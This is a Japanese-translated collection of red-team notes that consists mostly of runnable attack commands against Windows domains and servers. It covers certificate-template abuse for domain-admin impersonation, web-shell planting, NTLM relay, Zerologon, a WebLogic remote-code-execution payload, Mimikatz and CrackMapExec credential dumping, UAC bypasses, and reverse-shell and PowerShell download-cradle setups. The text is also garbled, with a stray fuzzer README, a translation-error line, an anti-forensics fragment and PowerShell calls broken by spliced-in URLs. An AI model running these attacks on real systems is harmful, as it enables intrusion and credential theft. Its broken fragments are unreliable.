
RedTeam/Pentest のメモと、プロフェッショナルなエンゲージメントに関連する複数のインフラストラクチャでテストされた実験。
ペネトレーションテスターやレッドチーマーがセキュリティ評価中に使用するさまざまなツールやテクニックを用いた、複数の制御された環境/インフラでテストした私のペネトレーションテスト/レッドチーミング実験に関する公開メモです。
GitHubのプルリクエストとしての貢献を歓迎します。
尽力してくれた人々に感謝と称賛を
免責事項
教育目的のみで使用し、自己責任で使用してください。
ネットワーク上で動作しているドメイン名とWindowsマシンに関する情報を収集します。```bash bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i 192.168.1.1/24
または```bash
bash$ responder-RunFinger
IPネットワークをスキャンしてNetBIOS名情報を取得します。```bash bash$ sudo nbtscan -v -s : 192.168.1.0/24
## Crackmapexec v 4.0
SMB情報に基づいてネットワーク範囲をスキャンします。```bash
bash$ cme smb 192.168.1.1/24
すべてのマシンネットワークをスキャンし、出力を保存します。
高速スキャン```bash bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP
集中スキャン(推奨注意):```bash
bash$ nmap -p 1-65535 -Pn -A -oA output target_IP
Scan with enumeration of the running services version :
## Angry IP スキャナー
このリンクからツールをダウンロードしてください :
[Angry IP Scanner](http://angryip.org/download/#linux)
* 環境設定を変更する
> Preferences -> Ports に移動 : ポート選択に 80,445,554,21 ,22 を追加 <br>
> Preferences -> Display に移動 : Alive Hosts を選択 <br>
> Preferences -> Pinging に移動 : Combained (UDP/TCP) を選択 <br>
# 横方向移動とエクスプロイト
### Active Directory 証明書サービス
この部分は https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#esc1---misconfigured-certificate-templates からコピーしました
<br>詳細は https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation を確認してください
(プライベート環境でテスト済み (Bloodhound 次に ESC1 エクスプロイト))
* ADCS サーバーを見つける
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* certutil を使用して AD エンタープライズ CA を列挙する: `certutil.exe -config - -ping`, `certutil -dump`
#### ESC1 - 誤設定された証明書テンプレート
> ドメインユーザーは **VulnTemplate** テンプレートに登録できます。このテンプレートはクライアント認証に使用でき、**ENROLLEE_SUPPLIES_SUBJECT** が設定されています。これにより、誰でもこのテンプレートに登録し、任意の Subject Alternative Name (すなわち DA として) を指定できます。サブジェクトを超えて証明書に追加の ID をバインドできます。
要件:
* AD 認証を許可するテンプレート
* **ENROLLEE_SUPPLIES_SUBJECT** フラグ
* [PKINIT] クライアント認証、スマートカードログオン、任意の目的、または EKU なし (拡張キー使用法)
エクスプロイト:
* 脆弱なテンプレートがあるかどうかを確認するには [Certify.exe](https://github.com/GhostPack/Certify) を使用します
```ps1
Certify.exe find /vulnerable
Certify.exe find /vulnerable /currentuser
# or
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
# or
certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
```
* Certify、[Certi](https://github.com/eloypgz/certi)、または [Certipy](https://github.com/ly4k/Certipy) を使用して証明書を要求し、代替名 (偽装するユーザー) を追加します
```ps1
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --alt-name han --template UserSAN
certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'
```
* OpenSSL を使用して証明書を変換します。パスワードを入力しないでください
```ps1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```
* cert.pfx をターゲットマシンのファイルシステムに移動し、Rubeus を使用して altname ユーザーの TGT を要求します
```ps1
Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
```
**警告**: これらの証明書は、ユーザーまたはコンピューターがパスワードをリセットしても引き続き使用できます!
**注**: **EDITF_ATTRIBUTESUBJECTALTNAME2**、**CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**、**ManageCA** フラグ、および AD CS HTTP エンドポイントへの NTLM リレーを探してください。
#### ESC2 - 誤設定された証明書テンプレート
要件:
* 要求者が CSR で Subject Alternative Name (SAN) を指定できるようにし、また Any Purpose EKU (2.5.29.37.0) を許可します
エクスプロイト:
* テンプレートを見つける ```ps1
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
/altnameをドメイン管理者として指定して証明書を要求します。ESC3は、証明書テンプレートがCertificate Request Agent EKU(登録エージェント)を指定している場合です。このEKUを使用して、他のユーザーに代わって証明書を要求できます。
ドメイン認証を許可するテンプレートに対して、
mspki-certificate-name-flagフラグを有効にすると、攻撃者が「設定ミスをテンプレートにプッシュしてESC1の脆弱性を引き起こす」ことを可能にします。
WritePropertyの値が00000000-0000-0000-0000-000000000000であるものを、modifyCertTemplateを使用して検索します。 ```ps1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
ESC1を実行するために、ENROLLEE_SUPPLIES_SUBJECT (ESS) フラグを追加する ```ps1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
C:>StandIn.exe --adcs --filter WebServer --ess --add
ESC1を実行し、その後値を復元する ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
Certipyの使い方```ps1
certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC4' -alt '[email protected]'
certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
> このフラグがCAに設定されている場合、サブジェクトがActive Directoryから構築される場合を含むすべてのリクエストで、サブジェクト代替名にユーザー定義の値を設定できます。
悪用方法:
* [Certify.exe](https://github.com/GhostPack/Certify) を使用して、`EDITF_ATTRIBUTESUBJECTALTNAME2` フラグを指す **UserSpecifiedSAN** フラグの状態を確認します。
```ps1
Certify.exe cas
```
* デフォルトの `User` テンプレートは通常、代替名の指定を許可しませんが、テンプレート用の証明書を要求し、altname を追加します。
```ps1
.\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
```
緩和策:
* フラグを削除します : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
#### ESC7 - 脆弱な証明機関のアクセス制御
悪用方法:
* 低特権ユーザーに `ManageCA` または `Manage Certificates` の権限を許可するCAを検出します。
```ps1
Certify.exe find /vulnerable
```
* 脆弱なCAの下にあるすべてのテンプレートに対してSAN拡張を有効にするようにCA設定を変更します (ESC6)
```ps1
Certify.exe setconfig /enablesan /restart
```
* 希望するSANで証明書を要求します。
```ps1
Certify.exe request /template:User /altname:super.adm
```
* 必要に応じて承認を付与するか、承認要件を無効にします。
```ps1
# Grant
Certify.exe issue /id:[REQUEST ID]
# Disable
Certify.exe setconfig /removeapproval /restart
```
**ManageCA** から ADCS サーバー上の **RCE** への代替悪用方法:```ps1
# Get the current CDP list. Useful to find remote writable shares:
Certify.exe writefile /ca:SERVER\ca-name /readonly
# Write an aspx shell to a local web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
# Write the default asp shell to a local web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
# Write a php shell to a remote web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
攻撃者は、PetitPotamを使用してドメインコントローラーをトリガーし、NTLMリレー認証情報を任意のホストに送信できます。その後、ドメインコントローラーのNTLM認証情報をActive Directory証明書サービス(AD CS)のWeb登録ページにリレーし、DC証明書を登録できます。この証明書は、TGT(Ticket Granting Ticket)を要求し、Pass-The-Ticketを介してドメイン全体を侵害するために使用できます。
Require Impacket PR #1101
Version 1: NTLM Relay + Rubeus + PetitPotam ```powershell impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
git clone https://github.com/topotam/PetitPotam python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP python3 dementor.py -u -p -d python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
必要条件:
StrongCertificateBindingEnforcement が 1 (デフォルト) または 0 に設定されているmsPKI-Enrollment-Flag 値に CT_FLAG_NO_SECURITY_EXTENSION フラグが含まれているAny Client 認証 EKU を指定しているGenericWrite 権限を持ち、任意のアカウントBを侵害するシナリオ
[email protected] は [email protected] に対して GenericWrite を持っており、[email protected] を侵害したいと考えています。[email protected] は、msPKI-Enrollment-Flag 値に CT_FLAG_NO_SECURITY_EXTENSION フラグを指定する証明書テンプレート ESC9 に登録することが許可されています。
certipy shadow auto -username [email protected] -p Passw0rd -account Jane
@corp.local 部分はそのまま残す
certipy account update -username [email protected] -password Passw0rd -user Jane -upn Administrator
certipy req -username [email protected] -hashes ... -ca corp-DC-CA -template ESC9
# 証明書内の userPrincipalName は Administrator
# 発行された証明書には "object SID" が含まれていない
certipy account update -username [email protected] -password Passw0rd -user [email protected]
certipy auth -pfx administrator.pfx -domain corp.local
# 証明書にドメインが指定されていないため、コマンドラインに -domain <domain> を追加してください。
ICPR リクエストに対して暗号化が強制されておらず、Request Disposition が Issue に設定されている
必要条件:
悪用方法:
certipy find -u [email protected] -p 'REDACTED' -dc-ip 10.10.10.10 -stdout の出力で Enforce Encryption for Requests: Disabled を探すntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
例えば、コンピュータアカウント DavesLaptop$ のパスワードは daveslaptop になります。
$ を \ でエスケープするのが賢明です。```bash
impacket-smbclient /$:@Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] SMB SessionError: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT(The account used is a computer account. Use your global user account or local user account to access this server.)
注意:`STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`
### パスワードの変更
次のいずれかを使用できます:
- https://github.com/fortra/impacket/blob/master/examples/changepasswd.py
- https://github.com/api0cradle/impacket/blob/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py```bash
python3 rpcchangepwd.py <domain>/<computer account>\$:<password>@<IP> -newpass P@ssw0rd 31s
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Password was changed successfully.
impacket-smbclient /$:@ Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Type help for list of commands
**- 参考 : https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/**
---
### CVE-2021-42278 および CVE-2021-42287 の悪用
エクスプロイトスクリプトをダウンロード https://github.com/WazeHell/sam-the-admin```bash
bash$ python3 sam_the_admin.py "<domain_name>/<username>:<password>" -dc-ip <DC_IP>
ADが脆弱な場合、以下の出力が得られます。

SecuraBV zerologonスキャナー https://github.com/SecuraBV/CVE-2020-1472
crackmapexecを使用してDC名を抽出できます。```bash
bash$ python3 zerologon_tester.py EXAMPLE-DC 1.2.3.4
ターゲットが脆弱な場合、スキャナは以下の出力を表示します:
<img src="https://raw.githubusercontent.com/ihebski/A-Red-Teamer-diaries/master/zerologon/scanner.png" alt="zerologon スキャナ">
### zerologon の悪用
- このエクスプロイトはドメイン管理者パスワードをリセットする可能性があります。代わりに zer0dump エクスプロイトを使用できます https://github.com/bb00/zer0dump
- 管理者パスワードのダンプ(ターゲットが一人のユーザーのみの場合はユーザー名を変更してください)
<img src="https://raw.githubusercontent.com/ihebski/A-Red-Teamer-diaries/master/zerologon/dump-Administrator-Password.png" alt="dump NTLM" >
pass-the-hash による RCE の取得
<img src="https://raw.githubusercontent.com/ihebski/A-Red-Teamer-diaries/master/zerologon/get_RCE_psexec.png" alt="RCE">
> 提供されたスクリーンショットは、POC テストのみに使用される個人用ラボに関連しています。PROD(エンゲージメント中)の DC でエクスプロイトを実行する際は注意してください。
## BIGIP F5 CVE-2020-5902
ターゲットが脆弱かどうかを確認する```bash
curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
NucleiやNmapを使用してターゲットをスキャンすることもできます
複数のホストが指定されている場合は、-l argument を使用してください -> -l bigip-assets.txt
* Nmap```bash
wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse
Metasploit モジュールを使用できます https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4
Nuclei Module```bash nuclei -t nuclei-templates/cves/CVE-2020-14882.yaml -target http://
このモジュールは時々失敗します。トラフィックをBurpsuiteにリダイレクトして調査するには、-proxy-url http://127.0.0.1:8080 を使用してください。
## Weblogic CVE-2020-14882 の悪用 - RCE```bash
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
cmd: chcp 65001&&whoami&&ipconfig
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1258
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
res.getServletOutputStream().flush();
res.getWriter().write("");
}executeThread.interrupt();
");
bash$ nmap -p445 --script smb-vuln-ms17-010 /24
もしターゲットが脆弱である場合、出力は以下のようになります。
Script Output<br>
Host script results:```bash
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
## Mimikatz - Metasploit
meterpreterシェルを取得した後、Mimikatzが正しく機能するためには、セッションが**SYSTEMレベルの特権**で実行されていることを確認する必要があります。```bash
meterpreter > getuid
Server username: WINXP-E95CE571A1\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz Loading extension mimikatz...success.
AuthID Package Domain User Password
0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f } 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;56683 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO)
AuthID Package Domain User Password
0;999 NTLM WORKGROUP WINXP-E95CE571A1$
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;56683 NTLM
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword
meterpreter > mimikatz_command -f sekurlsa::searchPasswords [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword }
meterpreter > mimikatz_command -f sekurlsa::logonpasswords
## Mimikatz on Linux
VMが利用できない場合
### ステップ 1```bash
winetricks msasn1
╰─>$ wine /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe 0009:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
.#####. mimikatz 2.2.0 (x86) #18362 May 13 2019 01:34:39 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
gentilkiwi ( [email protected] )'## v ##' Vincent LE TOUX ( [email protected] ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz #
# Windowsの権限昇格
### JuicyPotato```bash
JuicyPotato.exe -l <PORT> -p c:\windows\system32\cmd.exe -t *
msf > ps msf exploit(bypassuac) > migrate
### Windows UAC保護の昇格バイパス```bash
msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
msf > use exploit/windows/local/bypassuac_injection msf exploit(bypassuac_injection) > set session 1 msf exploit(bypassuac_injection) > exploit
### Windows UAC保護バイパス(昇格)(Script Host脆弱性)```bash
msf > use windows/local/bypassuac_vbs
msf exploit(bypassuac_vbs) > set session 1
msf exploit(bypassuac_vbs) > exploit
msf > use windows/local/ask msf exploit(ask) > set session 1 msf exploit(ask) > exploit
### MS16-032 セカンダリログオンハンドルの権限昇格 Windows 7 32 bit```bash
msf > use windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit
msf exploit(ms13_053_schlamperei) >set session 1 msf exploit(ms13_053_schlamperei) >exploit
## Crackmapexec V4.0
ターゲットを列挙する```
bash$ cme smb <target>
有効なユーザー名/パスワードによるマシンへのアクセス``` bash$ cme smb -u username -p password
NTLMハッシュを使用したマシンへのアクセス(PWN3Dが表示された場合、ユーザーのハッシュは管理者権限)```
bash$ cme smb <target> -u username -H hash
共有フォルダの一覧表示``` bash$ cme smb -u username -p password --shares
アクティブなセッションを列挙する```
bash$ cme smb <target> -u username -p password --sessions
RIDのブルートフォース攻撃によってユーザーを列挙する(デフォルト: 4000)``` bash$ cme smb -u username -p password --rid-brute
指定されたコマンドを実行してください```
bash$ cme smb <target> -u username -p password -x 'whoami'
指定されたPowerShellコマンドを実行します``` bash$ cme smb -u username -p password -X 'whoami'
ハッシュを取得```
bash$ cme smb <target> -u username -p password --sam
crackmapexec smb
### ヌル/ゲスト認証のテストと共有リストの表示```bash
crackmapexec smb targets.txt -u '' -p '' --shares
(入力されたMarkdownコンテンツがありません。翻訳対象のテキストを提供してください。)```bash crackmapexec smb targets.txt -u 'Guest' -p '' --shares
### LDAPを使用してユーザーを列挙する```bash
crackmapexec ldap <domain> -u '' -p '' --users
Online Search エンジン。TTD ファイルは C:\Users\USERNAME\AppData\Local\Temp\[RANDOM]\ に作成されます。
Scavengingこれは、ユーティリティ Program Compatibility Assistant (PCA) によってシステムに記録および保存されたすべてのデータを削除します。この機能はデフォルトでは無効ですが、システム管理者によるトラブルシューティング セッションで使用された可能性があります。クリーンアップのために収集されたログの削除は、管理者にとって正当な場合があります。攻撃者は、アンチフォレンジック の理由で保存されたデータを削除する可能性があります。
PCA の収集されたすべてのデータを消去するには、以下のコマンドを使用できます。
[0] PCA の収集されたすべてのログSDelete ツールを使用して PCA フォルダーを安全に削除するか、scavenging コマンドを使用してタスクを実行します。
| ターゲット | クリーン | コマンド |
|---|---|---|
| PCA の収集されたすべてのログ | 0 | scavenging |
| crackmapexec ldap -u users.txt -p "" -k |
### Asreproast```bash
crackmapexec ldap <domain> -u <username> -p "" --asreproast asrep.txt
crackmapexec ldap -u -p --bloodhound -ns --collection All
### グループポリシーの基本設定
- https://www.thehacker.recipes/ad/movement/credentials/dumping/group-policies-preferences```bash
crackmapexec smb <domain> -u <username> -p <password> -M gpp_password
crackmapexec smb targets.txt -u -p
### パスワードスプレー```bash
crackmapexec ldap <domain> -u users.txt -p <password> --continue-on-success
このリポジトリには、Tiny Fuzzerのソースコードが含まれています。Tiny Fuzzerは、容易な理解と独自プロジェクトへの統合を目的として設計された、シンプルで軽量なファザーです。
⚠️ 免責事項:このプロジェクトは教育および研究目的のみを対象としています。責任を持って使用し、所有するターゲットまたは明示的なテスト許可を得たターゲットにのみ使用してください。
git clone https://github.com/0xricksanchez/tiny_fuzzer.git
``````bash
crackmapexec ldap <domain> -u users.txt -p <password> --no-bruteforce --continue-on-success
この場合、-kオプションを使用すると、Kerberosプロトコルで認証できます。```bash
crackmapexec smb targets.txt -u -p -k
### 共有の一覧```bash
crackmapexec smb targets.txt -u <username> -p <password> -k --shares
spider_plus モジュールを使用すると、すべての読み取り可能な共有からすべてのファイルをリストおよびダンプできます。
crackmapexec smb -u -p -k -M spider_plus
#### すべてのファイルをダンプ```bash
crackmapexec smb <domain> -u <username> -p <password> -M spider_plus -o READ_ONLY=false
crackmapexec smb -u -p -k --get-file <target_file> <output_file> --share
### MSSQL
#### 認証テスト```bash
crackmapexec mssql targets.txt -u <username> -p <password>
xp_cmdshell を使用してコマンドを実行する-X は PowerShell 用、-x は cmd 用```bash
crackmapexec mssql -u -p -X <command_to_execute>#### ファイルを取得```bash
crackmapexec mssql <domain> -u <username> -p <password> --get-file <output_file> <target_file>
crackmapexec smb -u -p --local-auth
### LSAシークレットをダンプする```bash
crackmapexec smb <domain> -u <username> -p <password> --local-auth --lsa
--gmsa-convert-id オプションを使用する:```bash
crackmapexec ldap -u -p --gmsa-convert-id - LSA内のgmsaアカウントを `--gmsa-decrypt-lsa` で復号化します:```bash
crackmapexec ldap <domain> -u <username> -p <password> --gmsa-decrypt-lsa <gmsa_account>
crackmapexec smb targets.txt -u -p --laps
### dpapiの認証情報をダンプする```bash
crackmapexec smb targets.txt -u <username> -p <password> --laps --dpapi
crackmapexec smb -u -p --ntds
### References
- https://github.com/mpgn/CrackMapExec
- https://wiki.porchetta.industries/smb-protocol/scan-for-vulnerabilities
## Crackmapexec から Empire エージェントへ
まず、Empire リスナーをセットアップします:```
(Empire: listeners) > set Name test
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire.pem
(Empire: listeners) > run
(Empire: listeners) > list
[*] Active listeners:
ID Name Host Type Delay/Jitter KillDate Redirect Target
-- ---- ---- ------- ------------ -------- ---------------
1 test http://192.168.10.3:9090 native 5/0.0
(Empire: listeners) >
EmpireのRESTful APIサーバーを起動する:``` #~ python empire --rest --user empireadmin --pass Password123!
[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/
CME が Empire の RESTful API に認証するために使用するユーザー名とパスワードは、~/.cme/cme.conf にある cme.conf ファイルに保存されています:```
[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!
[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
その後、empire_execモジュールを実行し、リスナー名を指定するだけです。``` #~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test
# Crackmapexec から Meterpreter へ
metinjectモジュールを使用して、PowerSploitのInvoke-Shellcode.ps1スクリプトを使ってmeterpreterをメモリに直接注入することができます。
最初にハンドラを設定します。```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.10.3
LHOST => 192.168.10.3
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.10.3:8443
msf exploit(handler) > [*] Starting the payload handler...
次に、metinjectモジュールを実行し、LHOSTとLPORTの値を指定します:``` #~ crackmapexec 192.168.10.0/24 -u username -p password -M metinject -o LHOST=192.168.1
# EmpireからMeterpreter metasploitへのシェルの受け渡し
metasploit listner options```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set lhost 192.168.1.110
lhost => 192.168.1.110
msf exploit(handler) > set lport 2286
lport => 2286
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > exploit -j
エージェントをMetasploitに送信するようにEmpireを設定する``` use module code_execution/shellcode_inject set Host set Port execute
# DeathStar```
# Start the Empire console and RESTful API
python empire --rest --username empireadmin --password Password123
次に、DeathStarを取得、セットアップ、実行します。``` git clone https://github.com/byt3bl33d3r/DeathStar
pip3 install -r requirements.txt ./DeathStar.py
# Windows cmd.exe コマンド
## ユーザーの追加```
net user /add [username] [password]
net localgroup administrators [username] /add
## RDPグループにユーザーを追加する```
NET LOCALGROUP "Remote Desktop Users" keyoke /ADD
例 :
```
pth-winexe -U DOMAIN/USERNAME%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb //IP_Server cmd.exe
実例 :<br>```
pth-winexe -U LAB/Administrator%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb //192.168.1.44 cmd.exe
msf exploit(web_delivery) > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set L
set LHOST set LISTENERCOMM set LOGLEVEL set LPORT
msf exploit(web_delivery) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(web_delivery) > set LPORT 1233
LPORT => 1233
msf exploit(web_delivery) > exploit
[*] Exploit running as background job 0.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? [] Started reverse TCP handler on 127.0.0.1:1233 [] Using URL: http://0.0.0.0:8080/gOAr7kQOTh msf exploit(web_delivery) > [] Local IP: http://10.2.15.194:8080/gOAr7kQOTh [] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c $j=new-object net.webclient;$j.proxy=[Net.WebRequest]::GetSystemWebProxy();$j.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $j.downloadstring('http://127.0.0.1:8080/gOAr7kQOTh');
pth_winexeで開かれたcmdにPowerShellコマンドをコピーしてください。
## Active Directory```
# current domain info
[System.DirectoryServices.ActiveDirectory.Domain]:https://raw.githubusercontent.com/ihebski/a-red-teamer-diaries/HEAD/:GetCurrentDomain()
# domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
# current forest info
[System.DirectoryServices.ActiveDirectory.Forest]:https://raw.githubusercontent.com/ihebski/a-red-teamer-diaries/HEAD/:GetCurrentForest()
# get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
# get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain
# get DC for currently authenticated session
nltest /dsgetdc:offense.local
# get domain trusts from cmd shell
nltest /domain_trusts
# get user info
nltest /user:"spotless"
# get DC for currently authenticated session
set l
# get domain name and DC the user authenticated to
klist
# get all logon sessions. Includes NTLM authenticated sessions
klist sessions
# kerberos tickets for the session
klist
# cached krbtgt
klist tgt
# whoami on older Windows systems
set u
